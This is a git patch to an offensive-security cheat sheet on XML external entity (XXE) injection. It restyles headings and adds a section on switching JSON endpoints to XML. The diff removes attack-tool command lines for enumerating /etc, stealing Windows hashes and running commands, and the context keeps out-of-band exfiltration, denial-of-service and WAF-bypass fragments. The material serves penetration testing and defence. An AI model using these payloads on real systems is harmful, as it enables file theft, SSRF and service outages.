From 846706b87dac4cbd74990d802f103f8fbb1c47ab Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 10:43:39 +0100
Subject: [PATCH] XXE on JSON Endpoints
---
XXE Injection/README.md | 172 +++++++++++++++++++---------------------
1 file changed, 82 insertions(+), 90 deletions(-)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index c0d3ffe..05908f4 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -6,34 +6,36 @@
## Summary
- [Tools](#tools)
-- [Detect the vulnerability](#detect-the-vulnerability)
-- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
+- [Detect The Vulnerability](#detect-the-vulnerability)
+- [Exploiting XXE to Retrieve Files](#exploiting-xxe-to-retrieve-files)
- [Classic XXE](#classic-xxe)
- - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded)
- - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
- - [XInclude attacks](#xinclude-attacks)
-- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
-- [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service)
+ - [Classic XXE Base64 Encoded](#classic-xxe-base64-encoded)
+ - [PHP Wrapper Inside XXE](#php-wrapper-inside-xxe)
+ - [XInclude Attacks](#xinclude-attacks)
+- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks)
+- [Exploiting XXE to Perform a Denial of Service](#exploiting-xxe-to-perform-a-denial-of-service)
- [Billion Laugh Attack](#billion-laugh-attack)
- - [YAML attack](#yaml-attack)
- - [Parameters Laugh attack](#parameters-laugh-attack)
+ - [YAML Attack](#yaml-attack)
+ - [Parameters Laugh Attack](#parameters-laugh-attack)
- [Exploiting Error Based XXE](#exploiting-error-based-xxe)
- [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
- [Error Based - Using Remote DTD](#error-based---using-remote-dtd)
-- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
+- [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
- [Blind XXE](#blind-xxe)
- [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
- - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
+ - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter)
- [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
+- [XXE with Local DTD](#xxe-with-local-dtd)
- [WAF Bypasses](#waf-bypasses)
- - [Bypass via character encoding](#bypass-via-character-encoding)
+ - [Bypass via Character Encoding](#bypass-via-character-encoding)
+ - [XXE on JSON Endpoints](#xxe-on-json-endpoints)
- [XXE in Java](#xxe-in-java)
-- [XXE in exotic files](#xxe-in-exotic-files)
- - [XXE inside SVG](#xxe-inside-svg)
- - [XXE inside SOAP](#xxe-inside-soap)
- - [XXE inside DOCX file](#xxe-inside-docx-file)
- - [XXE inside XLSX file](#xxe-inside-xlsx-file)
- - [XXE inside DTD file](#xxe-inside-dtd-file)
+- [XXE in Exotic Files](#xxe-in-exotic-files)
+ - [XXE Inside SVG](#xxe-inside-svg)
+ - [XXE Inside SOAP](#xxe-inside-soap)
+ - [XXE Inside DOCX file](#xxe-inside-docx-file)
+ - [XXE Inside XLSX file](#xxe-inside-xlsx-file)
+ - [XXE Inside DTD file](#xxe-inside-dtd-file)
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
- [Labs](#labs)
- [References](#references)
@@ -41,58 +43,14 @@
## Tools
-- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
- ```ps1
- sudo ./xxeftp -uno 443
- ./xxeftp -w -wps 5555
- ```
-- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/)
- ```ps1
- $ python3 230.py 2121
- ```
-- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
- ```ps1
- # Enumerating /etc directory in HTTPS application:
- ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
- # Enumerating /etc directory using gopher for OOB method:
- ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
- # Second order exploitation:
- ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
- # Bruteforcing files using HTTP out of band method and netdoc protocol:
- ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
- # Enumerating using direct exploitation:
- ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
- # Enumerating unfiltered ports:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
- # Stealing Windows hashes:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
- # Uploading files using Java jar:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
- # Executing system commands using PHP expect:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
- # Testing for XSLT injection:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
- # Log requests only:
- ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
- ```
-- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
- ```ps1
- ruby server.rb
- ```
-- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
- ```ps1
- ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx
- ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place
- ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place
- ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx
- ```
-- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.
- ```ps1
- python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
- ```
+- [staaldraad/xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
+- [lc/230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/)
+- [enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
+- [BuffaloWill/oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
+- [whitel1st/docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
-## Detect the vulnerability
+## Detect The Vulnerability
**Internal Entity**: If an entity is declared within a DTD it is called an internal entity.
Syntax: ``
@@ -113,7 +71,7 @@ Basic entity test, when the XML parser parses the external entities the result s
It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
-## Exploiting XXE to retrieve files
+## Exploiting XXE to Retrieve Files
### Classic XXE
@@ -153,13 +111,13 @@ We try to display the content of the file `/etc/passwd`.
```
-### Classic XXE Base64 encoded
+### Classic XXE Base64 Encoded
```xml
%init; ]>
```
-### PHP Wrapper inside XXE
+### PHP Wrapper Inside XXE
```xml
]>
@@ -183,7 +141,7 @@ We try to display the content of the file `/etc/passwd`.
&xxe;
```
-### XInclude attacks
+### XInclude Attacks
When you can't modify the **DOCTYPE** element use the **XInclude** to target
@@ -194,7 +152,7 @@ When you can't modify the **DOCTYPE** element use the **XInclude** to target
-## Exploiting XXE to perform SSRF attacks
+## Exploiting XXE to Perform SSRF Attacks
XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
@@ -208,7 +166,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
```
-## Exploiting XXE to perform a denial of service
+## Exploiting XXE to Perform a Denial of Service
:warning: : These attacks might kill the service or the server, do not use them on the production.
@@ -225,7 +183,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
&a4;
```
-### YAML attack
+### YAML Attack
```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
@@ -239,7 +197,7 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
-### Parameters Laugh attack
+### Parameters Laugh Attack
A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping.
@@ -334,7 +292,7 @@ Let's break down the payload:
-## Exploiting blind XXE to exfiltrate data out-of-band
+## Exploiting Blind XXE to Exfiltrate Data Out of Band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
@@ -376,7 +334,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
%all;
```
-### XXE OOB with DTD and PHP filter
+### XXE OOB with DTD and PHP Filter
```xml
@@ -415,7 +373,7 @@ Send the XML file to the `deploy` folder.
Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
-## XXE with local DTD
+## XXE with Local DTD
In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
```xml
@@ -451,26 +409,33 @@ Assuming payloads such as the previous return a verbose error. You can start poi
]>
```
+
### Cisco WebEx
-```
+
+```xml
Your DTD code
%local_dtd;
```
+
### Citrix XenMobile Server
-```
+
+```xml
Your DTD code
%local_dtd;
```
-[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
+
+* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs.
+
## WAF Bypasses
-### Bypass via character encoding
+### Bypass via Character Encoding
XML parsers uses 4 methods to detect encoding:
+
* HTTP Content Type: `Content-Type: text/xml; charset=utf-8`
* Reading Byte Order Mark (BOM)
* Reading first symbols of document
@@ -491,6 +456,31 @@ XML parsers uses 4 methods to detect encoding:
cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
```
+
+### XXE on JSON Endpoints
+
+In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**,
+
+| Content Type | Data |
+| ------------------ | ---------------------------------- |
+| `application/json` | `{"search":"name","value":"test"}` |
+| `application/xml` | `namedata` |
+
+
+* XML documents must contain one root (``) element that is the parent of all other elements.
+* The data must be converted to XML too, otherwise the server will respond with an error.
+
+```json
+{
+ "errors":{
+ "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."
+ }
+}
+```
+
+* [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4)
+
+
## XXE in Java
Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE:
@@ -512,9 +502,10 @@ Ref.
- [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java)
- [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/)
-## XXE in exotic files
-### XXE inside SVG
+## XXE in Exotic Files
+
+### XXE Inside SVG
```xml